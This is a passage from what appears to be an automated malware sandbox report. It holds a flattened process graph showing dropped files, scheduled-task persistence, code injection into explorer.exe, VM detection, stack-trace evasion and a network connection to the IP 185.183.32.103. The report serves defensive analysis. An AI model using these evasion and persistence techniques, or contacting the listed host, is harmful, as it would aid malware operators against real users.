rights) 66->215 217 Contains functionality to start a terminal service 66->217 219 5 other signatures 66->219 signatures18 process19 file20 111 C:\Users\user\AppData\...\TradeHub.url, MS 70->111 dropped 78 conhost.exe 70->78         started        80 conhost.exe 73->80         started        82 schtasks.exe 73->82         started        113 C:\Users\user\AppData\Local\Temp\han, PE32 75->113 dropped 245 Injects code into the Windows Explorer (explorer.exe) 75->245 247 Drops PE files with a suspicious file extension 75->247 249 Uses schtasks.exe or at.exe to add and modify task schedules 75->249 251 4 other signatures 75->251 84 explorer.exe 75->84         started        89 conhost.exe 75->89         started        signatures21 process22 dnsIp23 155 185.183.32.103 WORLDSTREAMNL Netherlands 84->155 91 C:\Users\user\AppData\Local\...\Kytabo.db, DOS 84->91 dropped 179 System process connects to network (likely due to code injection or exploit) 84->179 181 Query firmware table information (likely to detect VMs) 84->181 183 Switches to a custom stack to bypass stack traces 84->183 file24 signatures25

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.